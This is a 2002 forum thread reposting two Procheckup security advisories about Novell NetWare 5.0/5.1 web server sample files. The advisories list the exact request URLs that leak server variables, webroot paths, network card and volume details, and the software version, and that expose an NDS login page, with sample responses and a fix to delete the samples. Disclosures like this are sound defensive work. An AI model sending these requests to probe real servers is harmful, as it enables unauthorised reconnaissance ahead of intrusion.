Vulnerability in Novell Netware 5.0

***micael*** · May 30th, 2002, 07:10 AM

Vulnerability in Novell Netware 5.0 (part1)

Source: bugtraq@securityfocus.com

Procheckup Ltd http://www.procheckup.com
Procheckup Security Bulletin PR02-1

Description: Netware default programs displays server
variables including web root location
Date: 8/1/2002

Application: Netware enterprise web server
Platform: Novell NetWare 5.0
Severity: Remote attackers can discover the location of the webroot.
Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
Reference: http://www.procheckup.com/security_info/vuln.html

Description:
NetWare 5.1 installed with default settings, installs with
the Novonyx webserver. This webserver resides on port 80
and comes with sample files which disclose information

1) Requesting the following url :-

http://webserver/lcgi/sewse.nlm?
sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse

The following information is returned:-

Here are the ScriptEase:WSE input values
_argv[-1] = "SEWSE"
_argv[0]
= "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE"

Current directory is
NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
Here are the cgi.getVar() values
Here are the Clib.getenv() values
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, */*
HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm
HTTP_ACCEPT_LANGUAGE=en-gb
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.0; EncExt; T312461; Q312461)
HTTP_HOST=192.168.1.109
HTTP_CONNECTION=Keep-Alive
HTTP_COOKIE=N2S19P61=963269677
ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config
NETSITE_ROOT=/novonyx/suitespot
SERVER_NAMES=lcgi
ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-
null Authorization: NS-value-is-null UserDN: NS-value-is-
null
SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield
.jse
NS_SESSION=-751448704
NS_REQUEST=-695399320
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/

==========================================================

2) ALSO

Requesting the following url :-
http://192.168.1.109/lcgi/sewse.nlm?
sys:/novonyx/suitespot/docs/sewse/misc/test.jse

The following information is returned:-

SERVER_SOFTWARE=Netscape 3.5 for NetWare
SERVER_PORT=80
SERVER_NAME=NETWARE.PROCHECKUP.COM
SERVER_URL=http://192.168.1.109
REMOTE_HOST=192.168.1.250
REMOTE_ADDR=192.168.1.250
HTTPS=OFF
GATEWAY_INTERFACE=LCGI/1.1
SERVER_PROTOCOL=HTTP/1.1
REQUEST_METHOD=GET
SCRIPT_NAME=/lcgi/sewse.nlm
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse

NS_SESSION=-798892160
NS_REQUEST=-800372600
FN=lcgi_map_init
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
http://192.168.1.109

3) ALSO

Requests the following url :-
http://webserver/perl/samples/env.pl

The following information is returned:-

HSERVER_SOFTWARE Netscape 3.5 for NetWare
GATEWAY_INTERFACE LCGI/1.1
NS_SESSION -707141760
REMOTE_ADDR 192.168.1.250
SERVER_PROTOCOL HTTP/1.1
NS_REQUEST -695399320
PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl
REQUEST_METHOD GET
REMOTE_HOST 192.168.1.250
SERVER_URL http://192.168.1.109
SERVER_NAMES perl
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.0; EncExt; T312461; Q312461)
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, */*
HTTP_CONNECTION Keep-Alive
HTTP_ACCEPT_LANGUAGE en-gb
HTTPS OFF
CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/
FN lcgi_map_init
SCRIPT_NAME /perl
HTTP_ACCEPT_ENCODING gzip, deflate
ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config
PERL_ROOT SYS:novonyx/suitespot/docs/perlroot
SERVER_NAME NETWARE.PROCHECKUP.COM
PATH_INFO /samples/env.pl
HTTP_COOKIE N2S19P61=963269677
SERVER_PORT 80
ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-
null Authorization: NS-value-is-null UserDN: NS-value-is-
null
HTTP_HOST 192.168.1.109
PATH_TRANSLATED
SYS:novonyx/suitespot/docs/perlroot/samples/env.pl
NETSITE_ROOT /novonyx/suitespot

Solution:

Delete all default example programs if not needed.

Legal:

Copyright 2002 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this
Bulletin to the Internet community for the purpose of
alerting them to problems, if and only if, the Bulletin is
not edited or changed in any way, is attributed to
Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.

Any other use of this information is prohibited.
Procheckup is not
liable for any misuse of this information by any third
party.

--------------------------------------------------------------------------------

***micael*** · May 30th, 2002, 07:13 AM

Vulnerability in Novell Netware 5.0 (part2)

Source: bugtraq@securityfocus.com

Procheckup Ltd
http://www.procheckup.com
Procheckup Security Bulletin PR02-3

Description:
Netware default programs display server
information to attackers.
Date: 8/1/2002

Application: Netware enterprise web server
Platform: Novell NetWare 5.0
Severity: Remote attackers can discover the location of the webroot
Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
Reference: http://www.procheckup.com/security_info/vuln.html

Description:
NetWare 5.1 installed with default settings, installs with
the Novonyx webserver. This webserver resides on port 80
and comes with sample files which disclose information

1) Requesting the following url :-

http://webserver/perl/samples/lancgi.pl

Gives lan board details.

Lan Boards

Description Address Media Type Board Number Board Instance
Compaq Ethernet or Fast Ethernet NIC 658B50004354
ETHERNET_802.2 1 1
Compaq Ethernet or Fast Ethernet NIC 658B50004354
ETHERNET_II 2 1

2) Requesting the following url :-

http://webserver/perl/samples/volscgi.pl

Gives the volume names with status information

Volumes

Description Total Space Free Space Block Size Total Dir
SYS 6065984 5390848 65536 66048

3) Requesting the following url :-

http://webserver/perl/samples/ndslogin.pl

Seems to allow remote interactive logins.... with NDS tree
viewing

Login to NDS and enumerate the contents

------------------------------------------------------------

Fullname: ex: nds:\\novell_tree\novell_context
Username: *

Password:

4) Requesting the following url :-

http://webserver/netbasic/websinfo.bas

Gives the server name and exact netware version running

Company: Novell
Revision: NetWare 5.00i
Date: 27 March 2000

Solution:

Delete all default example programs if not needed.

Legal:

Copyright 2002 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this
Bulletin to the Internet community for the purpose of
alerting them to problems, if and only if, the Bulletin is
not edited or changed in any way, is attributed to
Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup
is not liable for any misuse of this information by any
third party.

--------------------------------------------------------------------------------

Thread: Vulnerability in Novell Netware 5.0

Thread Tools

Display

Vulnerability in Novell Netware 5.0

Posting Permissions